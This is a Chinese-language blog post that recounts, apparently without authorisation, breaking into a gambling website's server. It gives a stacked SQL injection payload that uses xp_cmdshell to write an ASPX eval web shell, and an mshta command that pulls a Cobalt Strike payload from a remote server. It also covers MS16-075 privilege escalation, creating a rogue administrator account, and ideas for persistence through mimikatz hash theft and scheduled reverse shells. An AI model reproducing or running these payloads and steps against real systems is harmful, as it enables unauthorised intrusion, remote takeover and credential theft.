最初,我得到的只有一个后台网址,深深吸了口烟,可攻击点太少了。
如果没有弱口令,注入,和直接rce的点,是很难打开缺口的
所以首先第一步要做的事情进行信息搜集了!
渗透的本质是信息收集的
在网络空间安全搜索引擎fofa上查询一下,再就是端口扫描 ,直接略过,懂的都懂。
有利用价值的端口:80,81,1433,3389
脆弱点:http://49.xxx.xx.xxx:81/Login/index
但是通过一段常规操作操作后,发现后台登录界面存在堆叠注入!
且获得如下信息:
SQL注入post包(在响应包中得到ASP.NET+Microsoft-IIS/7.5)
权限:SA
![记录某博彩网站渗透]( "记录某博彩网站渗透")
刚开始得到注入就想着进入后台看看,但是没有回显,就肝了一段时间的py脚本。
![记录某博彩网站渗透]( "记录某博彩网站渗透")
得到密码进入后台,模板千篇一律,无数据备份,无修改模板,上传个人判断基于白名单,有编辑器不过示例代码已删除,留言板不可留言,回过头来又看注入,既然是堆叠注入,那就可以执行SQL语句,然后一顿操作,嗯嗯嗯… 没有回显,代码如下:
![记录某博彩网站渗透]( "记录某博彩网站渗透")
以为到这里就结束了,没想到 3389端口登录失败,1433端口连接失败!这里我很懵,经过大佬的一番指导,可以把注入信息通过外带DNSLlog,或者直接使用xp_cmdshell执行命令,但是不知道是否开启,所有尝试了一下ping以下dnslog,还好前几天补过:
![记录某博彩网站渗透]( "记录某博彩网站渗透")
既然dnslog有回显,那就证明xp_cmdshel扩展开启,可以执行命令,这里两种思路:
第一种是cmd执行命令,输出到网站根目录
';exec master…xp_cmdshell ‘echo ^<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%^> > c:网站路径shell.aspx’;–
由于我爆不出来绝对路径就采用了第二种方法
第二种是下载木马,运行木马直接上线
cs设置好监听器,生成一个html application文件,然后上传到cs服务器上
在注入点执行
'; exec master.dbo.xp_cmdshell ‘mshta http:
过一会儿有台主机上线了
![记录某博彩网站渗透]( "记录某博彩网站渗透")
补丁安装200多,较多,把systeminfo中的信息漏洞对比,看有没有漏补的,发现可利用漏洞ms16-075
systeminfo | findstr KB3164038
https://github.com/vysecurity/reflectivepotato.git github上该exp的cna插件,加载到脚本管理器中
![记录某博彩网站渗透]( "记录某博彩网站渗透")
我这里直接创建管理员,但是更隐蔽的方法是通过mimikatz读取hash或者SSP获取明文密码,来获取持久控制,或者利用计划任务,过一段时间反弹shell回来!
渗透本就是逆天而行!
评论